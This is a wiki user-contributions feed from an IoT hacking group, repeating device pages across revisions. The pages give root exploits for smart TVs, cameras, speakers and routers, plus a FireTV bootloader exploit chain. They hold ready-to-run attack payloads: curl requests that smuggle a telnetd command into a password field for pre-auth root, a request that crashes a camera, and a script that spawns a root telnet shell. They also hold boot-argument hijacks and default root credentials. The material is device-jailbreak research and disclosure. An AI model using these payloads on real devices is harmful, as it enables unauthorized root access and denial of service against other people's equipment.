Exploitee.rs - User contributions [en]

FireFU Exploit

2018-11-01T04:20:24Z

0x00string: /* Attack Summary */

[[Category:Exploits]]
[[Category:Media Players]]

[[File:FireFULogo.png||250px|left|thumb]]

= FireFU =
FireFU is an exploit chain leveraging a read write primitive from the FireTV Cube and Pendant’s Amlogic S905Z microcontroller along with a heap overflow within the parsing of the devices RSV partition table allowing for the running of unsigned code.

== Attack Summary ==
This is all done through the exploit's install script but is documented here for the curious.

# We enter DFU mode by connecting to the devices HDMI port and passing “boot@USB” to the Amlogic S905Z through the HDMI’s i2c interface.
## In DFU mode, we are able to read and write memory. we leverage the read/write primitive to write to hardware registers for the MMC controller.
# After entering DFU, we write to the emmc controller to modify the devices flash.
## We copy the original RSV table to a new locations 3 blocks away.
## We modify the partition table layout to exploit a heap overflow within u-boot
### Heap overflow can be found in “bootloader/uboot-amlogic/p212/drivers/mmc/aml_emmc_partition.c” - get_ptbl_rsv()
#### U-Boot doesn't check for buffer size correctly when reading the partition table from RSV in eMMC
#### Exploit modifies the following in RAM
##### amzn_target_is_unlocked() to alway return 1
##### patch amzn_dm_verity_is_off to return true
##### patch amzn_target_device_type to alway return engineering device
##### fixup bootm address for fastboot
## Because we exploit u-boot early on in the boot chain and we do it every boot, we are able to modify u-boot in ram breaking the secure boot “chain of trust” and allowing for unsigned code to be ran.
# The HDMI i2c connection is then disconnected and the device is rebooted into fastboot
## From fastboot we flash the following
### a new boot.img with magisk installed for superuser access
### a new recovery to fix issues with the Fire Tv recovery accessing the old RSV location.
# We then reboot to complete the root process.

== Flow Chart ==
[[File:FireFuFlow.png|1000px]]

== Exploit ==
DFU + U-Boot Exploit for AFTV Stark + Needle

* Tested on FW 6.2.5.5 for Needle
* Tested on FW 6.2.5.5 for Stark

=== Disclaimer ===
Exploitee.rs would like to remind users that any flashing of unofficial firmware or usage of provided tools is done at your own risk and will likely void your device’s warranty.

=== Preamble ===
While this process can be done in a virtual machine, a lot of data is backed up and flashed during this process and a VM environment will drastically slow down communication in DFU mode.

=== Tools Needed ===
# AFTV Stark/Needle
# HDMI breakout or an HDMI cable that can be cut
# Arduino, Teensy or any Arduino compatible dev board that provides an I2C bus.
# Linux box

=== Preparing HDMI dongle ===
This process has only been tested with the Arduino Due and Teensy 3. Other boards are untested!

#Please check Wikipedia for the standard HDMI pinout: https://en.wikipedia.org/wiki/HDMI
#connect following pin to your Arduino <table><tr><th>HDMI</th><th>Arduino</th></tr><tr><td>PIN 15 (SCL)</td><td>I2C SCL</td></tr><tr><td>PIN 16 (SDA)</td><td>I2C SDA</td></tr><tr><td>PIN 17 (GND)</td><td>I2C GND</td></tr></table>
#Hook up the Arduino to your PC and flash the hdmi_arduino.ino sketch in the hdmi_dongle/hdmi_arduino folder.

=== Rooting Proccess ===
# setup udev rules (or equivalent) to allow usb access for
#* idVendor=1b8e, idProduct=c003 (aml DFU)
#** ID 1b8e:c003 Amlogic, Inc.
#* idVendor=18d1, idProduct=0d02 (fastboot)
#** ID 18d1:0d02 Google Inc. Celkon A88
# DFU tool depends on libusb so make sure libusb is install
# Connect the HDMI dongle to your AFTV & power to your Arduino (or equivalent)
# Connect micro-usb cable to your AFTV
# Power up the FireTV device
# Check lsusb on your linux box to see if the device has entered DFU mode
#* look for something similar to this: ID 1b8e:c003 Amlogic, Inc.
#* if the device does not show up then try to reset the FireTV and try again
# Run install_exploit.sh on your linux box
#* This process can take about 30min-60min
#* Remember to keep your backup safe!
# Side load Magisk Manager apk on your AFTV
#* Download APK from https://github.com/topjohnwu/Magisk/releases
#* adb install magisk.apk
# Done :)

=== Miscellaneous Information ===

==== Disabling OTA ====
Any update can remove the code signing update or possibly brick the device. We recommend disabling OTA updates with the following.
* Run following commands as root
** pm disable com.amazon.tv.forcedotaupdater
** pm disable com.amazon.device.software.ota
** pm disable com.amazon.device.software.ota.override
You can also block update DNS domain at your router or install a custom recovery to be safe.

==== OTA Updates & Installing New Images ====
After each amazon supplied new image or OTA update, you must patch the boot and recovery images again (because of FireFu's RSV relocation).

Steps to patch boot+recovery image if you accidently flash unpatch image / take OTA image:
# Enter DFU mode with the HDMI dongle
# Dump the boot image:
#* ./aml_usb_mmc -r -s 0x16800 -c 0x8000 -f backup_boot.img
# Dump the recovery image:
#* ./aml_usb_mmc -r -s 0x1F000 -c 0x8000 -f backup_recovery.img
# Patch the boot image:
#* cd magisk_patcher
#* ./boot_patch.sh backup_boot.img
# Patch the recovery image:
#* cd magisk_patcher
#* AFTV_ONLY_RSV_TABLE=1 ./boot_patch.sh backup_recovery.img
# Enter Fastboot:
#* Enter DFU mode with the HDMI dongle
#* check to see if device enumerated with lsusb. if not, reboot and retry
#* run ./aml_reboot fastboot
#* The device should now be in fastboot mode
# Flash the boot image:
#* fastboot flash boot IMAGE.img
# Flash the recovery image:
#* fastboot flash recovery IMAGE.img

=== Downloads ===
Below is the download information for the exploit.

==== Exploit package ====
This download is intended for users who are only seeking the binaries to perform the exploit.

==== Source Code ====
This is for the users who are needing to recompile the exploit or are just curious about the process.

Vizio P602UI

2017-08-09T06:05:39Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:VIZIO_P602UI.JPG|120px|left|thumb]]
[[Category:Television]]

=Vizio P602UI=

"Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra HD Full-Array LED Smart TV. With powerful Ultra HD performance and best-in-class picture quality of Full-Array LED backlight, 64 Active LED Zones, and Clear Action 960 for incomparable contrast levels, sharpest details and deepest, purest black levels, the P-Series is your crystal-clear window to an exhilarating world where picture is everything. In addition, P-Series is fully equipped and ready for nearly all Ultra HD entertainment options. With support for HEVC decoding and the latest Wi-Fi standard 802.11ac, P-Series lets you stream Ultra HD from popular apps such as Netflix. Its superior Spatial Scaling Engine accurately and beautifully transforms your favorite 1080p Full HD sports, movies, and TV shows into spectacular Ultra HD. And support for the latest HDMI standards enables Ultra HD playback from next generation cable and satellite receivers, Blu-ray players and game consoles. The VIZIO P-Series: Simply Beautiful."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/VIZIO-P602ui-B3-60-Inch-Ultra-Smart/dp/B00M2FBEG0/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Vizio P602UI at Amazon]

==Hardware Root==
The eMMC chip on this device is located [pictured]

<gallery>
VIZIO_P602UI_EMMC.JPG
</gallery>

dump emmc

review filesystem

add persistent telnet shell

==Software Root==

TV has a HTML User Manual, opened via the "hidden" Opera Browser. The User Manual has an update procedure which downloads a tar file, uses gpg for signing.

<pre style="white-space: pre-wrap;">
<script>
sigma.exec("wget https://....");
</script>
</pre>

A custom App can open a webpage on the local filesystem

<pre style="white-space: pre-wrap;">
URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html
</pre>

Custom HTML page contains
<pre style="white-space: pre-wrap;">
<script>
var sigma = new SigmaBridge();
sigma.exec("/bin/busybox telnetd -l/bin/sh -p1337");
</script>
</pre>

Launch the app, log in via telnet or netcat

Tenvis T8810

2017-08-09T06:04:37Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:TENVIS_T8110.JPG|120px|left|thumb]]
[[Category:Networking]]

=Tenvis T8810=

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

<pre style="white-space: pre-wrap;">
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>

<gallery>
TENVIS_T8110_UART.JPG
</gallery>

==Remote Denial of Service==

===WARNING===

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

<pre style="white-space: pre-wrap;">
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
<pre>

Samsung SL-M3320ND

2017-08-09T06:03:35Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:SAMSUNG_SLM3320ND.JPG|120px|left|thumb]]
[[Category:Networking]]

=Samsung SL-M3320ND Printer=

"The robust ProXpress M3320ND features print speeds of up to35 ppm. Powered by a Cortex™-A5 core processor and 128 MB of memory, it delivers unsurpassed performance for business applications. High performance coupled with ease-of-use enables businesses to accelerate document and image processing for increased efficiency."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Samsung-ProXpress-SL-M3320ND-Monochrome-Printer/dp/B00COA3GVE/ref=sr_1_3?s=electronics&ie=UTF8&qid=1502258594&sr=1-3&tag=exploiteers-20 Purchase the Samsung SL-M3320ND at Amazon]

==Unsigned NAND Backup and Overwrite==

?????????

<gallery>
SAMSUNG_SLM3320ND_NAND.JPG
SAMSUNG_SLM3320ND_FW_HEX.JPG
SAMSUNG_SLM3320ND_INK_LEVEL.JPG
</gallery>

MUZO Cobblestone

2017-08-09T06:02:46Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:MUZO.JPG|120px|left|thumb]]
[[Category:IOT]]

=MUZO Cobblestone=

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258551&sr=1-1&tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]

==Telnet Default Credentials==

Device permits logins as root with username <code>admin</code> and password <code>admin</code>

==Pre Auth Root Command Injection==

Target: /httpapi.asp

<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

AOBO Hidden Spy Camera 720P

2017-08-09T05:59:58Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:AOBO.JPG|120px|left|thumb]]
[[Category:Camera]]

=AOBO Hidden Spy Camera 720P=

"AOBO Hidden 720p Camera features a high definition 1280x720P video resolution. This hidden camera is the world's smallest HD camera which makes it the perfect camera and video recording or forensic tool for anyone. With its portable and hidden nature can record what happens at every moment."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Hidden-Camera-Wireless-Portable-Security/dp/B06XVDHTXR/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502255449&sr=1-1&tag=exploiteers-20 Purchase the AOBO Hidden Spy Camera 720P at Amazon]

==Open Wifi and Passwordless Telnet==
The Camera creates an open wireless access point, and spawns a Telnet and FTP service. Login using username root with no password.

GGMM E3 Smart Speaker

2017-08-09T05:58:45Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:GGMME3.JPG|120px|left|thumb]]
[[Category:IOT]]

=GGMM E3 Smart Speaker=

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]

==Pre Auth Root Command Injection==

Target: /httpapi.asp

<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

Cujo

2017-08-09T05:57:52Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:CUJO.JPG|120px|left|thumb]]
[[Category:IOT]]

=Cujo=

"CUJO shields your home devices against hacks. CUJO network security firewall protects your computers and IoT devices against malware, ransomware, viruses, and other hacking threats. Think of it as advanced antivirus for all your connected devices - from laptops to smartphones."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/CUJO-Internet-Security-Firewall-SUBSCRIPTION/dp/B01MSEX7PT/ref=sr_1_1?ie=UTF8&qid=1502255730&sr=8-1&tag=exploiteers-20 Purchase the Cujo at Amazon]

==UART==

The UART Interface runs at ???????? baud at the pinout pictured

Drop to a U-Boot shell by grounding the eMMC data line at the right spot

After stage 1, while stage 2 is booting, hold for 3-4 seconds to ground

???????????

<gallery>
CUJO_GLUE.JPG
CUJO_UART.JPG
</gallery>

===Boot Output===

<pre style="white-space: pre-wrap;">
OCTEON eMMC stage 1 bootloader (CUJOv1.0)
Loading stage2
Success.
Branching to stage 2 at: 0xFFFFFFFF81000000
U-Boot 2013.07 (Development build, svnversion: u-boot:directory, exec:) (Build time: Dec 22 2016 - 21:42:51)
Cavium Inc. OCTEON SDK version 3.1.2, build 568: $Revision: 128476 $
EARLY FILL COUNT : 14, cpu_hertz:1000000000, ddr_hertz:666000000
LMC0 Asserting DDR_RESET_L
DDR Reference Hertz = 50000000
clkr: 0, en[5]: 6, clkf: 79, pll_MHz: 4000, ddr_hertz: 666666666, error: -666666
clkr: 0, en[2]: 3, clkf: 39, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 1, en[2]: 3, clkf: 79, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 2, en[2]: 3, clkf: 119, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 2, en[1]: 2, clkf: 79, pll_MHz: 1333, ddr_hertz: 666666666, error: -666666
clkr: 0, en[5]: 6, clkf: 79, pll_MHz: 4000, ddr_hertz: 666666666, error: -666666 <==
LMC0 De-asserting DDR_RESET_L
LMC0: Measured DDR clock: 666666794, cpu clock: 1000000000, ddr clocks: 133333699
LMC0: measured speed: 666666794 hz
Initializing node 0 DDR interface 0, DDR Clock 666666794, DDR Reference Clock 50000000, CPUID 0x000d9602
DDR SPD Table:
DIMM 0: DDR3 UDIMM, non-ECC D3-56CG107JT9V-999 chksum: 49305 (0xc099) 1.5V
row bits: 15, col bits: 10, bank bits: 3, banks: 8, ranks: 1, dram width: 16, size: 1024 MB
</pre>

Lutron L-BDG2-WH Caseta Smart Bridge

2017-08-09T05:57:23Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:LUTRON_CASETA.JPG|120px|left|thumb]]
[[Category:Networking]]

=Lutron L-BDG2-WH Caseta Smart Bridge=

"Controlling lights, shades, and temperature from a mobile device has never been easier or more reliable. The Lutron Smart Bridge allows for setup, control, and monitoring of Caseta Wireless dimmers and Serena Remote Controlled Shades from a smartphone, tablet, and even your Apple Watch TM wearable. The Lutron Smart Bridge also works with Apple HomeKit, Nest, select Honeywell Thermostats, Logitech Harmony remotes, and more. Schedule lights to adjust automatically based on the time of day, or create your favorite scenes that adjust multiple lights and shades with the press of a button. Enable geofencing to automatically turn your lights on/off when you leave or approach home, or to notify you that you left your lights on. All compatible products sold separately."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=as_li_ss_tl?s=electronics&ie=UTF8&qid=1502255332&sr=8-1&keywords=Lutron+LBDG2WH+Caseta+Smart&linkCode=ll1&tag=exploiteers-20&linkId=9245f587e1e259b8b10ab1e785d9411e Purchase the Lutron L-BDG2-WH at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ????????. Once the device completes booting, a root shell is executed on the UART TTY.

<gallery>
LUTRON_CASETA_UART.JPG
</gallery>

===UART Output===

MUZO Cobblestone

2017-08-09T05:39:14Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:IOT =MUZO Cobblestone= "MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wirel..."

__FORCETOC__
{{Disclaimer}}
[[File:MUZO.JPG|120px|left|thumb]]
[[Category:IOT]]

=MUZO Cobblestone=

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM Purchase the MUZO Cobblestone at Amazon]

==Telnet Default Credentials==

Device permits logins as root with username <code>admin</code> and password <code>admin</code>

==Pre Auth Root Command Injection==

Target: /httpapi.asp

<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

File:MUZO.JPG

2017-08-09T05:38:46Z

0x00string:

GGMM E3 Smart Speaker

2017-08-09T05:34:23Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:IOT =GGMM E3 Smart Speaker= "Enjoy the full rich sound by wirelessly streaming your favirote mu..."

__FORCETOC__
{{Disclaimer}}
[[File:GGMME3.JPG|120px|left|thumb]]
[[Category:IOT]]

=GGMM E3 Smart Speaker=

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA Purchase the GGMM E3 Smart Speaker at Amazon]

==Pre Auth Root Command Injection==

Target: /httpapi.asp

<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

File:GGMME3.JPG

2017-08-09T05:33:13Z

0x00string:

Cujo

2017-08-09T05:29:04Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:CUJO.JPG|120px|left|thumb]]
[[Category:IOT]]

=Cujo=

"CUJO shields your home devices against hacks. CUJO network security firewall protects your computers and IoT devices against malware, ransomware, viruses, and other hacking threats. Think of it as advanced antivirus for all your connected devices - from laptops to smartphones."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/CUJO-Internet-Security-Firewall-SUBSCRIPTION/dp/B01MSEX7PT/ref=sr_1_1?ie=UTF8&qid=1502255730&sr=8-1& Purchase the Cujo at Amazon]

==UART==

The UART Interface runs at ???????? baud at the pinout pictured

Drop to a U-Boot shell by grounding the eMMC data line at the right spot

After stage 1, while stage 2 is booting, hold for 3-4 seconds to ground

???????????

<gallery>
CUJO_GLUE.JPG
CUJO_UART.JPG
</gallery>

===Boot Output===

<pre style="white-space: pre-wrap;">
OCTEON eMMC stage 1 bootloader (CUJOv1.0)
Loading stage2
Success.
Branching to stage 2 at: 0xFFFFFFFF81000000
U-Boot 2013.07 (Development build, svnversion: u-boot:directory, exec:) (Build time: Dec 22 2016 - 21:42:51)
Cavium Inc. OCTEON SDK version 3.1.2, build 568: $Revision: 128476 $
EARLY FILL COUNT : 14, cpu_hertz:1000000000, ddr_hertz:666000000
LMC0 Asserting DDR_RESET_L
DDR Reference Hertz = 50000000
clkr: 0, en[5]: 6, clkf: 79, pll_MHz: 4000, ddr_hertz: 666666666, error: -666666
clkr: 0, en[2]: 3, clkf: 39, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 1, en[2]: 3, clkf: 79, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 2, en[2]: 3, clkf: 119, pll_MHz: 2000, ddr_hertz: 666666666, error: -666666
clkr: 2, en[1]: 2, clkf: 79, pll_MHz: 1333, ddr_hertz: 666666666, error: -666666
clkr: 0, en[5]: 6, clkf: 79, pll_MHz: 4000, ddr_hertz: 666666666, error: -666666 <==
LMC0 De-asserting DDR_RESET_L
LMC0: Measured DDR clock: 666666794, cpu clock: 1000000000, ddr clocks: 133333699
LMC0: measured speed: 666666794 hz
Initializing node 0 DDR interface 0, DDR Clock 666666794, DDR Reference Clock 50000000, CPUID 0x000d9602
DDR SPD Table:
DIMM 0: DDR3 UDIMM, non-ECC D3-56CG107JT9V-999 chksum: 49305 (0xc099) 1.5V
row bits: 15, col bits: 10, bank bits: 3, banks: 8, ranks: 1, dram width: 16, size: 1024 MB
</pre>

File:VERAEDGE LFD ROOT.JPG

2017-08-09T05:26:15Z

0x00string:

File:VERAEDGE.JPG

2017-08-09T05:26:07Z

0x00string:

Cujo

2017-08-09T05:20:03Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:IOT =Cujo= "CUJO shields your home devices against hacks. CUJO network security firewall protects..."

File:CUJO UART.JPG

2017-08-09T05:19:11Z

0x00string:

File:CUJO GLUE.JPG

2017-08-09T05:19:03Z

0x00string:

File:CUJO.JPG

2017-08-09T05:18:53Z

0x00string:

AOBO Hidden Spy Camera 720P

2017-08-09T05:14:29Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Camera =AOBO Hidden Spy Camera 720P= "AOBO Hidden 720p Camera features a high definition 1280x720..."

__FORCETOC__
{{Disclaimer}}
[[File:AOBO.JPG|120px|left|thumb]]
[[Category:Camera]]

=AOBO Hidden Spy Camera 720P=

"AOBO Hidden 720p Camera features a high definition 1280x720P video resolution. This hidden camera is the world's smallest HD camera which makes it the perfect camera and video recording or forensic tool for anyone. With its portable and hidden nature can record what happens at every moment."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Hidden-Camera-Wireless-Portable-Security/dp/B06XVDHTXR/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502255449&sr=1-1& Purchase the AOBO Hidden Spy Camera 720P at Amazon]

==Open Wifi and Passwordless Telnet==
The Camera creates an open wireless access point, and spawns a Telnet and FTP service. Login using username root with no password.

File:AOBO.JPG

2017-08-09T05:13:49Z

0x00string:

Vizio P602UI

2017-08-09T05:09:23Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Television =Vizio P602UI= "Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra..."

__FORCETOC__
{{Disclaimer}}
[[File:VIZIO_P602UI.JPG|120px|left|thumb]]
[[Category:Television]]

=Vizio P602UI=

"Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra HD Full-Array LED Smart TV. With powerful Ultra HD performance and best-in-class picture quality of Full-Array LED backlight, 64 Active LED Zones, and Clear Action 960 for incomparable contrast levels, sharpest details and deepest, purest black levels, the P-Series is your crystal-clear window to an exhilarating world where picture is everything. In addition, P-Series is fully equipped and ready for nearly all Ultra HD entertainment options. With support for HEVC decoding and the latest Wi-Fi standard 802.11ac, P-Series lets you stream Ultra HD from popular apps such as Netflix. Its superior Spatial Scaling Engine accurately and beautifully transforms your favorite 1080p Full HD sports, movies, and TV shows into spectacular Ultra HD. And support for the latest HDMI standards enables Ultra HD playback from next generation cable and satellite receivers, Blu-ray players and game consoles. The VIZIO P-Series: Simply Beautiful."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/VIZIO-P602ui-B3-60-Inch-Ultra-Smart/dp/B00M2FBEG0 Purchase the Vizio P602UI at Amazon]

==Hardware Root==
The eMMC chip on this device is located [pictured]

<gallery>
VIZIO_P602UI_EMMC.JPG
</gallery>

dump emmc

review filesystem

add persistent telnet shell

==Software Root==

TV has a HTML User Manual, opened via the "hidden" Opera Browser. The User Manual has an update procedure which downloads a tar file, uses gpg for signing.

<pre style="white-space: pre-wrap;">
<script>
sigma.exec("wget https://....");
</script>
</pre>

A custom App can open a webpage on the local filesystem

<pre style="white-space: pre-wrap;">
URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html
</pre>

Custom HTML page contains
<pre style="white-space: pre-wrap;">
<script>
var sigma = new SigmaBridge();
sigma.exec("/bin/busybox telnetd -l/bin/sh -p1337");
</script>
</pre>

Launch the app, log in via telnet or netcat

File:VIZIO P602UI EMMC.JPG

2017-08-09T05:09:09Z

0x00string:

File:VIZIO P602UI.JPG

2017-08-09T05:09:01Z

0x00string:

Lutron L-BDG2-WH Caseta Smart Bridge

2017-08-09T04:59:23Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Networking =Lutron L-BDG2-WH Caseta Smart Bridge= "Controlling lights, shades, and tempe..."

__FORCETOC__
{{Disclaimer}}
[[File:LUTRON_CASETA.JPG|120px|left|thumb]]
[[Category:Networking]]

=Lutron L-BDG2-WH Caseta Smart Bridge=

"Controlling lights, shades, and temperature from a mobile device has never been easier or more reliable. The Lutron Smart Bridge allows for setup, control, and monitoring of Caseta Wireless dimmers and Serena Remote Controlled Shades from a smartphone, tablet, and even your Apple Watch TM wearable. The Lutron Smart Bridge also works with Apple HomeKit, Nest, select Honeywell Thermostats, Logitech Harmony remotes, and more. Schedule lights to adjust automatically based on the time of day, or create your favorite scenes that adjust multiple lights and shades with the press of a button. Enable geofencing to automatically turn your lights on/off when you leave or approach home, or to notify you that you left your lights on. All compatible products sold separately."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=sr_1_1?s=hi&ie=UTF8&qid=1502254549&sr=1-18 Purchase the Lutron L-BDG2-WH at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ????????. Once the device completes booting, a root shell is executed on the UART TTY.

<gallery>
LUTRON_CASETA_UART.JPG
</gallery>

===UART Output===

File:LUTRON CASETA UART.JPG

2017-08-09T04:59:11Z

0x00string:

File:LUTRON CASETA.JPG

2017-08-09T04:59:00Z

0x00string:

Samsung SL-M3320ND

2017-08-09T04:52:00Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Networking =Samsung SL-M3320ND Printer= "The robust ProXpress M3320ND features print..."

__FORCETOC__
{{Disclaimer}}
[[File:SAMSUNG_SLM3320ND.JPG|120px|left|thumb]]
[[Category:Networking]]

=Samsung SL-M3320ND Printer=

"The robust ProXpress M3320ND features print speeds of up to35 ppm. Powered by a Cortex™-A5 core processor and 128 MB of memory, it delivers unsurpassed performance for business applications. High performance coupled with ease-of-use enables businesses to accelerate document and image processing for increased efficiency."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
